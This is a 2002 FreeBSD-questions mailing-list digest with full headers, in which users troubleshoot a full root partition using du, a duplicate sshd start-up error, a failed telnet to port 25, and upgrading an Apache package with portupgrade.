http://www.iki.fi/jylitalo "Some tools are used, because its policy, others because they are good." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:37: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cs.selu.edu (cs.selu.edu [147.174.59.5]) by hub.freebsd.org (Postfix) with ESMTP id F3B5037B407 for ; Mon, 24 Jun 2002 10:36:28 -0700 (PDT) Received: from localhost (jholland@localhost) by cs.selu.edu (8.11.6/8.11.2) with ESMTP id g5OHaQn29752; Mon, 24 Jun 2002 12:36:26 -0500 Date: Mon, 24 Jun 2002 12:36:24 -0500 (CDT) From: Jason P Holland To: "Henning, Brian" Cc: questions@FreeBSD.ORG Subject: RE: root partition In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG yes, absolutely, that is a best practice. if /var fills up, you don't want that to affect /. also, /tmp should be seperate, because its a DoS since /tmp can be written by any user, they could conceivably fill up /. the only case this would be ok, would be if you were installing on a smaller hard drive, which gives you less room to juggle around. jason > Jason, > that is the case... i have /usr and /home separate from /. > Do you think I should have a separate partition for /var? > Thanks, > brian > > -----Original Message----- > From: Jason P Holland [mailto:jholland@cs.selu.edu] > Sent: Monday, June 24, 2002 12:28 PM > To: Henning, Brian > Cc: questions@FreeBSD.ORG > Subject: RE: root partition > > > > what partitions do you have seperate from /? /usr and /home? > > most likely /var and /root are going to be growing if that is the case, > and /root is only going to grow if you add files yourself, /var will grow > as the logs grow. keep an eye on /var > > jason > > > here is the result of my > > du -sh * > > 6.0K COPYRIGHT > > 3.9M bin > > 390K boot > > 2.0K cdrom > > 0B compat > > 70K dev > > 2.0K dist > > 998K etc > > 636M home > > 4.0M kernel > > 3.5M kernel.GENERIC > > 2.0K mnt > > 5.1M modules > > 2.0K mycd > > 17K proc > > 99M root > > 11M sbin > > 2.1M stand > > 0B sys > > 8.0K tmp > > > > 1.8G usr > > 11M var > > > > > > -----Original Message----- > > From: Jason P Holland [mailto:jholland@cs.selu.edu] > > Sent: Monday, June 24, 2002 12:03 PM > > To: Henning, Brian > > Cc: questions@FreeBSD.ORG > > Subject: Re: root partition > > > > > > > > hmm, that is a bit low. you could investigate what is filling up? try a > > > > cd / > > du -sh * > > > > periodically, that should help you narrow down what is filling up. it > > might be the logs in /var though > > > > jason > > > > > Hello- > > > I keep having a problem with filling up my root partition. I combine / > and > > > /var with 150M of space. Is that enough space? I don't copy files to > this > > > partition so I don't really know how it would fill up? Should I just > > create > > > a bigger partition or is there something I am missing here? > > > thanks, > > > brian > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:38:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp08.wxs.nl (smtp08.wxs.nl [195.121.6.40]) by hub.freebsd.org (Postfix) with ESMTP id E5E6B37B403 for ; Mon, 24 Jun 2002 10:38:46 -0700 (PDT) Received: from alex.kruijff ([213.10.151.186]) by smtp08.wxs.nl (Netscape Messaging Server 4.15) with ESMTP id GY810K00.74X; Mon, 24 Jun 2002 19:38:44 +0200 Date: Mon, 24 Jun 2002 19:39:32 +0200 From: Alex X-Mailer: The Bat! (v1.53d) Reply-To: freebsd-reply@akruijff.dds.nl X-Priority: 3 (Normal) Message-ID: <358453545.20020624193932@dds.nl> To: "Henning, Brian" Cc: questions@FreeBSD.ORG Subject: Re[2]: root partition In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Dear Brian, Monday, June 24, 2002, 7:21:22 PM, you wrote: HB> here is the result of my HB> du -sh * HB> 99M root 'du -s * | sort -n' sorts the outcome of du on size (outcome in kb) This way you easly spot the largest dir. -- Best regards, Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:43:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.thundernet.cz (mail.thundernet.cz [62.77.87.114]) by hub.freebsd.org (Postfix) with SMTP id B5C3B37B404 for ; Mon, 24 Jun 2002 10:43:30 -0700 (PDT) Received: (qmail 12532 invoked from network); 24 Jun 2002 17:41:38 -0000 Received: from unknown (HELO freepuppy.bellavista.cz) (62.168.44.50) by mail.thundernet.cz with SMTP; 24 Jun 2002 17:41:38 -0000 Received: from freepuppy.bellavista.cz (localhost.bellavista.cz [127.0.0.1]) by freepuppy.bellavista.cz (8.12.4/8.11.6) with ESMTP id g5OHge4o042000; Mon, 24 Jun 2002 19:42:57 +0200 (CEST) (envelope-from neuhauser@bellavista.cz) Received: (from roman@localhost) by freepuppy.bellavista.cz (8.12.4/8.12.4/Submit) id g5OHgDgK041999; Mon, 24 Jun 2002 19:42:13 +0200 (CEST) X-Authentication-Warning: freepuppy.bellavista.cz: roman set sender to neuhauser@bellavista.cz using -f Date: Mon, 24 Jun 2002 19:42:12 +0200 From: Roman Neuhauser To: Eric Cc: freebsd-questions@freebsd.org Subject: Re: sshd error Message-ID: <20020624174212.GF36393@freepuppy.bellavista.cz> Mail-Followup-To: Eric , freebsd-questions@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > From: "Eric" > To: > Subject: sshd error > Date: Mon, 24 Jun 2002 08:30:11 -0800 > > Hi, > > I get the following error when I boot: > > "Local package initialization: squidsshd: SSH Secure Shell 3.1.2 > (non-commercial version) on i386-portbld-freebsd4.4 > June 24 20:20:53 hostname sshd:[245]: FATAL ERROR: creating listenter > failed: port 22 probably already in use! > sshd[245]: FATAL: creating listener failed: port 22 probably already in use! > sshd. > Additional TCP options. > > Monday June 24 20:20:59 MST 2002" > > [end error mesg] > > Could someone help me understand what is up here? you have installed /usr/ports/security/openssh(-portable), right? and didn't adjust /etc/rc.conf, getting two sshd daemons started, right? :) > This all happened at 8:30 am. The time seems to be off, huh? "time" at > root returns "syntax error near unexpected token". Not sure if there is a > relation between sshd problem and time prob. Is this the right list for > this prob? check your system time with date(1). time(1) is for timing execution of commands. I don't think these two problems are related. -- FreeBSD 4.6-STABLE 7:38PM up 16:38, 4 users, load averages: 0.05, 0.02, 0.00 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:50:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.navitaire.com (mail.navitaire.com [205.182.62.81]) by hub.freebsd.org (Postfix) with ESMTP id D0F1437B409 for ; Mon, 24 Jun 2002 10:50:00 -0700 (PDT) Received: from exchange.Navitaire.com (exch.navitaire.com [149.122.4.14]) by mail.navitaire.com (Switch-2.1.4/Switch-2.1.0) with ESMTP id g5OHnxr27646 for ; Mon, 24 Jun 2002 12:49:59 -0500 (CDT) Received: by exchange.Navitaire.com with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 12:48:02 -0500 Message-ID: From: "Henning, Brian" To: questions@FreeBSD.ORG Subject: RE: root partition Date: Mon, 24 Jun 2002 12:47:54 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I do see that my /root is 99MB and i am using root as my main log in. I plan on changing that to another user but, when i look in /root I don't see how this adds up to 99MB? trinity# ls -al total 54 drwxr-xr-x 8 root wheel 512 Jun 17 16:24 . drwxr-xr-x 19 root wheel 512 Jun 18 23:52 .. -rw-r--r-- 1 root wheel 238 Jun 10 15:15 .basilisk_ii_prefs -rw-r--r-- 2 root wheel 802 Jan 28 07:13 .cshrc -rw------- 1 root wheel 175 Jun 17 16:13 .fetchmailrc drwx------ 2 root wheel 512 Jun 14 18:12 .gaim -rw------- 1 root wheel 1174 Jun 14 18:12 .gaimrc -rw------- 1 root wheel 3106 Jun 24 10:51 .history -rw-r--r-- 1 root wheel 142 Jan 28 07:13 .klogin -rw-r--r-- 1 root wheel 297 Jan 28 07:13 .login drwx------ 3 root wheel 512 Jun 11 12:36 .micq drwxr-xr-x 2 root wheel 512 Jun 11 23:34 .mplayer -rw------- 1 root wheel 14616 Jun 17 13:23 .pinerc -rw-r--r-- 2 root wheel 251 Jan 28 07:13 .profile drwx------ 2 root wheel 512 Jun 17 22:33 .ssh drwxr-xr-x 2 root wheel 512 Jun 12 23:25 .vmware -rw-r--r-- 1 root wheel 373 Jun 10 13:03 cvsupfile -rw-r--r-- 1 root wheel 35 Jun 8 12:16 grub.txt drwx------ 2 root wheel 512 Jun 17 13:23 mail trinity# du -sh * 2.0K cvsupfile 2.0K grub.txt 6.0K mail any suggestions, brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:53: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cs.selu.edu (cs.selu.edu [147.174.59.5]) by hub.freebsd.org (Postfix) with ESMTP id 74E0837B419 for ; Mon, 24 Jun 2002 10:52:43 -0700 (PDT) Received: from localhost (jholland@localhost) by cs.selu.edu (8.11.6/8.11.2) with ESMTP id g5OHqe030186; Mon, 24 Jun 2002 12:52:40 -0500 Date: Mon, 24 Jun 2002 12:52:40 -0500 (CDT) From: Jason P Holland To: "Henning, Brian" Cc: questions@FreeBSD.ORG Subject: RE: root partition In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG did you try cd /root; du -sh * | sort -n? my guess is your mail dir is big, or possibly that .vmware dir, not sure. ls -al won't show you the total size of what is contained in the directory. jason > I do see that my /root is 99MB and i am using root as my main log in. I plan > on changing that to another user but, when i look in /root I don't see how > this adds up to 99MB? > > > trinity# ls -al > total 54 > drwxr-xr-x 8 root wheel 512 Jun 17 16:24 . > drwxr-xr-x 19 root wheel 512 Jun 18 23:52 .. > -rw-r--r-- 1 root wheel 238 Jun 10 15:15 .basilisk_ii_prefs > -rw-r--r-- 2 root wheel 802 Jan 28 07:13 .cshrc > -rw------- 1 root wheel 175 Jun 17 16:13 .fetchmailrc > drwx------ 2 root wheel 512 Jun 14 18:12 .gaim > -rw------- 1 root wheel 1174 Jun 14 18:12 .gaimrc > -rw------- 1 root wheel 3106 Jun 24 10:51 .history > -rw-r--r-- 1 root wheel 142 Jan 28 07:13 .klogin > -rw-r--r-- 1 root wheel 297 Jan 28 07:13 .login > drwx------ 3 root wheel 512 Jun 11 12:36 .micq > drwxr-xr-x 2 root wheel 512 Jun 11 23:34 .mplayer > -rw------- 1 root wheel 14616 Jun 17 13:23 .pinerc > -rw-r--r-- 2 root wheel 251 Jan 28 07:13 .profile > drwx------ 2 root wheel 512 Jun 17 22:33 .ssh > drwxr-xr-x 2 root wheel 512 Jun 12 23:25 .vmware > -rw-r--r-- 1 root wheel 373 Jun 10 13:03 cvsupfile > -rw-r--r-- 1 root wheel 35 Jun 8 12:16 grub.txt > drwx------ 2 root wheel 512 Jun 17 13:23 mail > > > trinity# du -sh * > 2.0K cvsupfile > 2.0K grub.txt > 6.0K mail > > > any suggestions, > brian > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:54:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tomts9-srv.bellnexxia.net (tomts9.bellnexxia.net [209.226.175.53]) by hub.freebsd.org (Postfix) with ESMTP id 99F7E37B400 for ; Mon, 24 Jun 2002 10:54:40 -0700 (PDT) Received: from xena.gsicomp.on.ca ([65.95.179.11]) by tomts9-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020624175435.BSHX1645.tomts9-srv.bellnexxia.net@xena.gsicomp.on.ca>; Mon, 24 Jun 2002 13:54:35 -0400 Received: from hermes (hermes.gsicomp.on.ca [192.168.0.18]) by xena.gsicomp.on.ca (8.11.3/8.11.3) with SMTP id g5OGeiE29456; Mon, 24 Jun 2002 12:40:44 -0400 (EDT) (envelope-from matt@gsicomp.on.ca) Message-ID: <01a801c21ba8$32c03c30$1200a8c0@gsicomp.on.ca> From: "Matthew Emmerton" To: "Henning, Brian" , References: Subject: Re: root partition Date: Mon, 24 Jun 2002 13:54:33 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG du -s * doesn't recurse through directories starting with a period. It's a unix-ism. Sorry for forgetting that before. Try 'du -s .[^\.]*' instead. (That's dot, open square bracket, caret, backslash, dot, close square bracket, asterisk) Matt ----- Original Message ----- From: "Henning, Brian" To: Sent: Monday, June 24, 2002 1:47 PM Subject: RE: root partition > I do see that my /root is 99MB and i am using root as my main log in. I plan > on changing that to another user but, when i look in /root I don't see how > this adds up to 99MB? > > > trinity# ls -al > total 54 > drwxr-xr-x 8 root wheel 512 Jun 17 16:24 . > drwxr-xr-x 19 root wheel 512 Jun 18 23:52 .. > -rw-r--r-- 1 root wheel 238 Jun 10 15:15 .basilisk_ii_prefs > -rw-r--r-- 2 root wheel 802 Jan 28 07:13 .cshrc > -rw------- 1 root wheel 175 Jun 17 16:13 .fetchmailrc > drwx------ 2 root wheel 512 Jun 14 18:12 .gaim > -rw------- 1 root wheel 1174 Jun 14 18:12 .gaimrc > -rw------- 1 root wheel 3106 Jun 24 10:51 .history > -rw-r--r-- 1 root wheel 142 Jan 28 07:13 .klogin > -rw-r--r-- 1 root wheel 297 Jan 28 07:13 .login > drwx------ 3 root wheel 512 Jun 11 12:36 .micq > drwxr-xr-x 2 root wheel 512 Jun 11 23:34 .mplayer > -rw------- 1 root wheel 14616 Jun 17 13:23 .pinerc > -rw-r--r-- 2 root wheel 251 Jan 28 07:13 .profile > drwx------ 2 root wheel 512 Jun 17 22:33 .ssh > drwxr-xr-x 2 root wheel 512 Jun 12 23:25 .vmware > -rw-r--r-- 1 root wheel 373 Jun 10 13:03 cvsupfile > -rw-r--r-- 1 root wheel 35 Jun 8 12:16 grub.txt > drwx------ 2 root wheel 512 Jun 17 13:23 mail > > > trinity# du -sh * > 2.0K cvsupfile > 2.0K grub.txt > 6.0K mail > > > any suggestions, > brian > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 11: 9:40 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.navitaire.com (mail.navitaire.com [205.182.62.81]) by hub.freebsd.org (Postfix) with ESMTP id AF2AF37B410 for ; Mon, 24 Jun 2002 11:07:19 -0700 (PDT) Received: from exchange.Navitaire.com (exch.navitaire.com [149.122.4.14]) by mail.navitaire.com (Switch-2.1.4/Switch-2.1.0) with ESMTP id g5OI7Cr28152; Mon, 24 Jun 2002 13:07:12 -0500 (CDT) Received: by exchange.Navitaire.com with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 13:05:15 -0500 Message-ID: From: "Henning, Brian" To: "'Matthew Emmerton'" , questions@FreeBSD.ORG Subject: RE: root partition Date: Mon, 24 Jun 2002 13:05:07 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello- You all are good!!!!!!!!!!!!!!! I found the large files and deleted them. du -s .[^\.]* was the command that worked. thanks for your help. brian -----Original Message----- From: Matthew Emmerton [mailto:matt@gsicomp.on.ca] Sent: Monday, June 24, 2002 12:55 PM To: Henning, Brian; questions@FreeBSD.ORG Subject: Re: root partition du -s * doesn't recurse through directories starting with a period. It's a unix-ism. Sorry for forgetting that before. Try 'du -s .[^\.]*' instead. (That's dot, open square bracket, caret, backslash, dot, close square bracket, asterisk) Matt ----- Original Message ----- From: "Henning, Brian" To: Sent: Monday, June 24, 2002 1:47 PM Subject: RE: root partition > I do see that my /root is 99MB and i am using root as my main log in. I plan > on changing that to another user but, when i look in /root I don't see how > this adds up to 99MB? > > > trinity# ls -al > total 54 > drwxr-xr-x 8 root wheel 512 Jun 17 16:24 . > drwxr-xr-x 19 root wheel 512 Jun 18 23:52 .. > -rw-r--r-- 1 root wheel 238 Jun 10 15:15 .basilisk_ii_prefs > -rw-r--r-- 2 root wheel 802 Jan 28 07:13 .cshrc > -rw------- 1 root wheel 175 Jun 17 16:13 .fetchmailrc > drwx------ 2 root wheel 512 Jun 14 18:12 .gaim > -rw------- 1 root wheel 1174 Jun 14 18:12 .gaimrc > -rw------- 1 root wheel 3106 Jun 24 10:51 .history > -rw-r--r-- 1 root wheel 142 Jan 28 07:13 .klogin > -rw-r--r-- 1 root wheel 297 Jan 28 07:13 .login > drwx------ 3 root wheel 512 Jun 11 12:36 .micq > drwxr-xr-x 2 root wheel 512 Jun 11 23:34 .mplayer > -rw------- 1 root wheel 14616 Jun 17 13:23 .pinerc > -rw-r--r-- 2 root wheel 251 Jan 28 07:13 .profile > drwx------ 2 root wheel 512 Jun 17 22:33 .ssh > drwxr-xr-x 2 root wheel 512 Jun 12 23:25 .vmware > -rw-r--r-- 1 root wheel 373 Jun 10 13:03 cvsupfile > -rw-r--r-- 1 root wheel 35 Jun 8 12:16 grub.txt > drwx------ 2 root wheel 512 Jun 17 13:23 mail > > > trinity# du -sh * > 2.0K cvsupfile > 2.0K grub.txt > 6.0K mail > > > any suggestions, > brian > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 11:10:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from skytrackercanada.com (cust29.209.188.66.dsl.accessv.com [209.188.66.29]) by hub.freebsd.org (Postfix) with ESMTP id 4AC7E37B406 for ; Mon, 24 Jun 2002 11:09:32 -0700 (PDT) Received: (from david@localhost) by skytrackercanada.com (8.12.3/8.12.3) id g5OI9KUQ022554 for questions@freebsd.org; Mon, 24 Jun 2002 14:09:20 -0400 (EDT) (envelope-from david) Date: Mon, 24 Jun 2002 14:09:20 -0400 From: David Banning To: questions@freebsd.org Subject: can't telnet anything on port 25 Message-ID: <20020624140920.A22529@skytrackercanada.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I can't seem to telnet any server on port 25; su-2.03# telnet skytrackercanada.com 25 Trying 209.188.66.29... telnet: connect to address 209.188.66.29: Operation timed out telnet: Unable to connect to remote host su-2.03# I can telnet using the default port just fine, and others can telnet into the machine, but it always gets this message no matter who I telnet. Am I missing something? What services, if any need to be running to get this operating? I do not have a firewall running. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 11:34:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from otter.mills-atl.com (dsl-64-192-140-77.telocity.com [64.192.140.77]) by hub.freebsd.org (Postfix) with ESMTP id 9E7D637B400 for ; Mon, 24 Jun 2002 11:34:23 -0700 (PDT) Received: from localhost (jmills@localhost) by otter.mills-atl.com (8.9.3/8.9.3) with ESMTP id OAA15868; Mon, 24 Jun 2002 14:38:42 -0400 X-Authentication-Warning: otter.mills-atl.com: jmills owned process doing -bs Date: Mon, 24 Jun 2002 14:38:42 -0400 (EDT) From: John Mills X-Sender: jmills@otter.mills-atl.com Reply-To: John Mills To: "Henning, Brian" Cc: questions@FreeBSD.ORG Subject: Re: root partition In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, Henning - On Mon, 24 Jun 2002, Henning, Brian wrote: > I keep having a problem with filling up my root partition. I combine / and > /var with 150M of space. Is that enough space? I don't copy files to this > partition so I don't really know how it would fill up? Should I just create > a bigger partition or is there something I am missing here? Check where '/tmp' and '/var/spool' (sorry if that's a linuxism - I'm writing from a RH box.) are mounted. You can generate big files in these, so you may want to soft-link them to a partition (slice) with generous free space. In particular, when the partition holding '/tmp' fills up you can lose some important functions: 'xdm' and even 'login'. I would keep '/' modest in size and put the 'dump' elsewhere, but that's just my taste. That may give you some more ideas, one of which might actually solve your problem. Cheers. - John Mills To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 11:48: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web11008.mail.yahoo.com (web11008.mail.yahoo.com [216.136.131.58]) by hub.freebsd.org (Postfix) with SMTP id BF6C737B400 for ; Mon, 24 Jun 2002 11:47:57 -0700 (PDT) Message-ID: <20020624184757.61593.qmail@web11008.mail.yahoo.com> Received: from [198.208.223.35] by web11008.mail.yahoo.com via HTTP; Mon, 24 Jun 2002 11:47:57 PDT Date: Mon, 24 Jun 2002 11:47:57 -0700 (PDT) From: Margie W Subject: Least Painful Upgrade Path To: FreeBSD-Questions@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Folks, I'm relatively new to BSD, so bear with me here... I have a system built about a month ago with 4.5-STABLE. One of the packages I installed at that time was Apache-2.0.35. I need to upgrade that package to 2.0.39 due to the security bug discovered last week. Is the easiest upgrade path to backup the site content, uninstall the package, and then re-install .39... then recreate the document directories.. and restore the content? Does pkg_add have a command line "upgrade" flag that I can use that automates all this? I've seen people metion CVS, which I'm not very familiar with. From what I've read, that seems the best bet for performing a system-wide code update/upgrade (I think people refer to this as a 'build world', right?)... but overkill for one package. Esp if I have to manually compose a functional Makefile and recompile the whole system. How do your answers change if I said I had a 4.0-STABLE system that I wanted to fully upgrade to 4.6, inc all packages/(custom) kernel. CVSsup? (I do, but it's another system that I can worry about later.) Appreciate any recommendations. __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 11:50:47 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 6942737B401 for ; Mon, 24 Jun 2002 11:50:42 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5OIoe4W010525; Mon, 24 Jun 2002 19:50:40 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5OIoZx8010524; Mon, 24 Jun 2002 19:50:35 +0100 (BST) Date: Mon, 24 Jun 2002 19:50:35 +0100 From: Matthew Seaman To: David Banning Cc: questions@FreeBSD.ORG Subject: Re: can't telnet anything on port 25 Message-ID: <20020624185034.GA10465@happy-idiot-talk.infracaninophi> References: <20020624140920.A22529@skytrackercanada.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624140920.A22529@skytrackercanada.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 24, 2002 at 02:09:20PM -0400, David Banning wrote: > > I can't seem to telnet any server on port 25; > > su-2.03# telnet skytrackercanada.com 25 > Trying 209.188.66.29... > telnet: connect to address 209.188.66.29: Operation timed out > telnet: Unable to connect to remote host > su-2.03# Seems that nothing is listening on the SMTP port --- since you aren't firewalled, I guess you aren't running an MTA --- sendmail, qmail, postfix or the like. You can see what ports daemons are listening on by running `netstat -a' or `sockstat'. Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 11:52:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.crackula.com (adsl-64-169-68-38.dsl.snfc21.pacbell.net [64.169.68.38]) by hub.freebsd.org (Postfix) with ESMTP id 0E3FA37B401 for ; Mon, 24 Jun 2002 11:52:33 -0700 (PDT) Received: (from monkey@localhost) by mail.crackula.com (8.9.3/8.9.3) id LAA25786; Mon, 24 Jun 2002 11:47:13 -0700 (PDT) Date: Mon, 24 Jun 2002 11:47:12 -0700 From: Adam Weinberger To: Margie W Cc: FreeBSD-Questions@FreeBSD.ORG Subject: Re: Least Painful Upgrade Path Message-ID: <20020624114712.A475@crackula.com> References: <20020624184757.61593.qmail@web11008.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: MarioMail Super Nintendo w/ 2 controllers In-Reply-To: <20020624184757.61593.qmail@web11008.mail.yahoo.com>; from walemom@yahoo.com on Mon, Jun 24, 2002 at 11:47:57AM -0700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG # cd /usr/ports/sysinstall/portupgrade # make install clean # portupgrade -v apache-2\* now, if you made your own VirtualHosts, and made your own separate directories (i.e. you didn't put all your pages under /usr/local/www/data) then you won't need to rebuild your httpd.conf or anything; it will all work fine. if you DID put your stuff under /usr/local/www/data then you will have to backup your data, but again the httpd.conf should remain undamaged. no reason not to back it up though ::) -Adam Margie W took 1.3K on Mon, Jun 24, 2002 at 11:47:57AM -0700 to say: > Folks, > > I'm relatively new to BSD, so bear with me here... > > I have a system built about a month ago with > 4.5-STABLE. One of the packages I installed at that > time was Apache-2.0.35. I need to upgrade that > package to 2.0.39 due to the security bug discovered > last week. > > Is the easiest upgrade path to backup the site > content, uninstall the package, and then re-install > .39... then recreate the document directories.. and > restore the content? > > Does pkg_add have a command line "upgrade" flag that I > can use that automates all this? > > I've seen people metion CVS, which I'm not very > familiar with. From what I've read, that seems the > best bet for performing a system-wide code > update/upgrade (I think people refer to this as a > 'build world', right?)... but overkill for one > package. Esp if I have to manually compose a > functional Makefile and recompile the whole system. > > > How do your answers change if I said I had a > 4.0-STABLE system that I wanted to fully upgrade to > 4.6, inc all packages/(custom) kernel. CVSsup? (I > do, but it's another system that I can worry about > later.) > > Appreciate any recommendations. > > __________________________________________________ > Do You Yahoo!? > Yahoo! - Official partner of 2002 FIFA World Cup > http://fifaworldcup.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- "I am disrespectful to dirt! Can you see I am serious!" -Mr. Sparkle Adam Weinberger monkey@crackula.com http://www.crackula.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 11:57: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from martin.kleinerdrache.org (static62-99-146-055.adsl.inode.at [62.99.146.55]) by hub.freebsd.org (Postfix) with SMTP id 8CF1F37B403 for ; Mon, 24 Jun 2002 11:57:02 -0700 (PDT) Received: (qmail 29618 invoked from network); 24 Jun 2002 